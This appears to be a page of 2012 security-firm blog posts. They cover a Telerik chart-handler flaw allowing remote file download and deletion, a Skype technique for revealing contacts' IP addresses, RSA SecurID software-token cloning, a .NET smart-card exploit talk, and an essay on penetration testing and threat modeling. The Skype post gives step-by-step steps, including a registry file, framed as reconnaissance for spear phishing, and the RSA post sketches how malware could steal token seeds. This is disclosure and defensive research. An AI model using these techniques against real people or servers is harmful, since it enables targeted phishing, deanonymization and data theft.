Grey bar Blue bar
Share this:

Fri, 14 Dec 2012

Dangers of Custom ASP.NET HttpHandlers

ASP.NET HttpHandlers are interesting components of a .NET web application when performing security assessments, mainly due to the fact they are the most exposed part of the application processing client requests in HttpContext level and at the same time, not yet part of the official ASP.NET framework.


As a result, data validation vulnerabilities in custom HttpHandlers can be exploited far easier than issues on the inner layer components. However, they are mostly overlooked during the web application tests for two reasons:


  1. They are used by a 3rd party component of a target application and often the auditor wants to focus on the main functions of the application

  2. They often are found performing such operations as displaying an icon file or chart from image cache. This is deemed useless during an assessment.


In this post, I'm going to demonstrate a data validation vulnerability in a custom HttpHandler which is used by a number of well known ASP.NET apps such as DotNetNuke CMS and was not fixed by the vendor until 2012/3. We still come across web applications that use this vulnerable component, so thought it useful that we document this vulnerability in the Telerik ASP.NET UI Control, which could allow a remote user to download and remove files from the web server under application's pool permission.


If you are using any of the Telerik components in your application, make sure to replace the "Telerik.Web.UI.dll" with the latest version (about 9MB!).


Vulnerability details:


The Telerik UI control has a web-based charts feature, which stores rendered graphic files in a cache folder for performance reasons. It registers a custom HttpHandler in the web.config file, which processes the following GET request and displays the chart in the client browser:


http://site/ChartImage.axd?useSession=false&imageFormat=image/png&ImageName=[base64 encoded value]


The next step is to decompile the code of the ChartHttpHandler.ProcessRequest(HttpContext), which gives us:



Although, the ImageName query string parameter is encrypted using an AES algorithm to prevent tampering, the encryption key and initialization vector are embedded in the application's assembly (Telerik.Web.UI.dll) and can be used to construct malicious requests to download files from the remote server, as shown in the following figure:



All versions up to and including 2011.2.915.35 are vulnerable. I've created a proof of concept that can be downloaded here . Please note that the target file will be deleted from the web server by the chart image handler after being downloaded from the server, as it considers the requested file as an expired cache entry.


Next time you are on an assessment, don't overlook the mundane and not-so-interesting parts of the application, as they can often provide you with an additional attack surface area.

Mon, 26 Nov 2012

Skype Passive IP Disclosure Vulnerability

When performing spear phishing attacks, the more information you have at your disposal, the better. One tactic we thought useful was this Skype security flaw disclosed in the early days of 2012 (discovered by one of the Skype engineers much earlier).

For those who haven't heard of it - this vulnerability allows an attacker to passively disclose victims external, as well as internal, IP addresses in a matter of seconds, by viewing the victims VCard through an 'Add Contact' form.

Why is this useful?

1. Verifying the identity and the location of the target contact. Great when performing geo-targeted phishing attacks.

2. Checking whether your Skype account has not been used elsewhere :)

3. Spear phishing enumeration while Pen Testing.

4. Just out of plain curiosity.

To get this working, following these basic steps:

1. Download and install the patched version of Skype 5.5 from here (the patch enables the Skype client to save the logs in non obfuscated form)

2. Save the lines below as a Skype_log_patch.reg reg file:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]
"LastLanguage"="en"
"Logging"="SkypeDebug2003"
"Logging2"="on"
Once saved, run it to enable the Skype Debug Log File.

4. Start Skype.

5. Search for any Skype contact and click on the 'Add a Skype Contact' button, but do not send the request, rather click on the user to view their VCard.

4. Open the log file (it should appear in the same folder as Skype executable e.g. debug-20121003-0150)

5. Look for the PresenceManager line - you should see something similar to this - >

In the above image you can spot my Skype name, external as well as internal IP addresses.

The log will include similar credentilas for everyone listed as a "contact" under your Skype account, as well as many other fresh, genuine and useful information received directly from your local Skype tracker.

Mon, 10 Sep 2012

44Con: Vulnerability analysis of the .NET smart Card Operating System

Today's smart cards such as banking cards and smart corporate badges are capable of running multiple tiny applications which are often written in high level programming languages like Java or Microsoft .NET and compiled into small card resident binaries. It is a critical security requirement to isolate the execution context and data storage of these applications in order to protect them from unauthorized access by other malicious card applications. To satisfy this requirement, multi-application smart cards implement an “Application Firewall” concept in their operating system which creates an execution sandbox for card applications.

During the recent 44con conference in London, we presented the "HiveMod" reverse engineering tool for .NET smart cards and demonstrated the exploitation of a vulnerability to bypass the card's application firewall. The talk also highlighted threats and possible attack scenarios against smart corporate or military badges.

The presentation slides can be viewed below:

The following video shows exploitation of the "public key token spoofing" vulnerability on the .net smart card using the "HiveMod" tool:

Please contact SensePost research team for more information.

Thu, 24 May 2012

RSA SecureID software token update

There has been a healthy reaction to our initial post on our research into the RSA SecureID Software Token. A number of readers had questions about certain aspects of the research, and I thought I'd clear up a number of concerns that people have.

The research pointed out two findings; the first of which is in fact a design vulnerability in RSA software's "Token Binding" mechanism. The second finding is another design issue that affects not only RSA software token but also any other software, which generates pseudo-random numbers from a "secret seed" running on traditional computing devices such as laptops, tablets or mobile phones. The correct way of performing this has been approached with hardware tokens, which are often tamper-resistant.

Let me first explain one of the usual use cases of RSA software token deployments:

  1. The user applies for a token via a RSA self-service console or a custom web form
  2. The user receives an email which contains the "software token download URL", once the software is installed, they should open the program and then choose Token Storage Devices where they would read the "Device Serial Number" and reply back with this device serial number to complete their token request.
  3. The second email will contain an attachment of the user's personal RSA SecurID Token Configuration file, which they will import to the RSA software token. This configuration file is bound to the users' laptop or PC.
  4. The third email contains an initial password to activate the token.
An attacker who is able to capture the victim's configuration file and initial password (The security of this initial password is subject to future research at SensePost and will be released in the future) would be able to import it into his token using the described method to bypass the token binding. This attack can be launched remotely and does not require a "fully compromised machine" as RSA have stated.

The second finding, as I mentioned before, is a known issue with all software tokens. Our aim at SensePost was to demonstrate how easy/hard it would be for an attacker, who has already compromised a system, to extract RSA token secrets and clone them on another machine. A number of people commented on the fact that we did not disclose the steps required to update the LSA secrets on the cloned system. Whilst this technique is relatively easy to do, it is not required for this attack to function.

If a piece of malware was written for this attack, it does NOT have to grab the DPAPI blobs and replicate them on the attackers machine. It can simply hook into the CryptUnprotectData and steal the decrypted blobs once the RSA software token starts execution. The sole reason I included the steps to replicate the DPAPI on another machine, was that this research was performed during a real world assessment, which was time-limited. We chose to demonstrate the attack to the client by replicating the DPAPI blobs instead of developing a proof of concept malcode.

A real-world malware targeting RSA software tokens would choose the API hooking method or a similar approach to grab the decrypted seed and post it back to the attacker.

"I'm also curious to know whether software token running on smartphones might be vulnerable."

The "Token Binding" bypass attack would be successful on these devices, but with a different device serial ID calculation formula. However, the application sandboxing model deployed on most modern smartphone operating systems, would make it more difficult for a malicious application, deployed on the device, to extract the software token's secret seeds. Obviously, if an attacker has physical access to a device for a short time, they would be able to extract those secrets. This is in contrast to tamper-proof hardware tokens or smart cards, which by design provide a very good level of protection, even if they are in the hands of an attacker for a long time.

"Are the shortcomings you document particular to RSA or applicable to probably applicable to Windows software tokens from rival vendors too?"

All software tokens found to be executing a pseudo-random number generation algorithm that is based on a "secret value", are vulnerable to this type of cloning attack, not because of algorithms vulnerabilities, but simply because the software is running on an operating system and storage that is not designed to be tamper-resistance like modern smart cards, TPM chips and secure memory cards.

One solution for this might be implementing a "trusted execution" environment into CPUs, which has been done before for desktop and laptops by Intel (Intel TXT) and AMD. ARM's "trustzone" technology is a similar implementation, which targets mobile phone devices and secures mobile software's from logical and a range of physical attacks.

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The raises some interesting ideas and I felt I'd like to comment on some of the points he was making.

As I understood it, the talk's hypothesis could be (over) simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use '0-day cards', which allow the tester to emulate the use of a 0-day on a specific system without needing to actually have one. Think of this like a joker in a game of cards.
To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypotheses. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which specific definition of Penetration Test he was using. However, given the emphasis later in the talk about the significance of the 0-day and 'owning' things, I'm assuming he was using the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: There are cases of course where a customer wants us simply to 'own' something, or somethings, but most often Penetration Testing is performed within the context of some broader assessment within which many of Haroon's concerns may already be being addressed. As the talk pointed out, there are instances where the question is asked "can we breached?", or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed it's a model that's been used by the military for decades. However for the most part penetration testing should only be used as a specific phase in an assessment and to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; Hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant, and interesting component of the talk's thesis has to do with the role of "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't have tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby to illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.

What I struggle to understand however, is why the talk emphasizes the particular 'joker' over a number of others that seems apparent to me. For example, why not have a "malicious system administrator card", a "spear phishing card", a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrate there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't doesn't invalidate penetration testing itself, it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows:

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.
This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing that addresses all the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time-to-time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...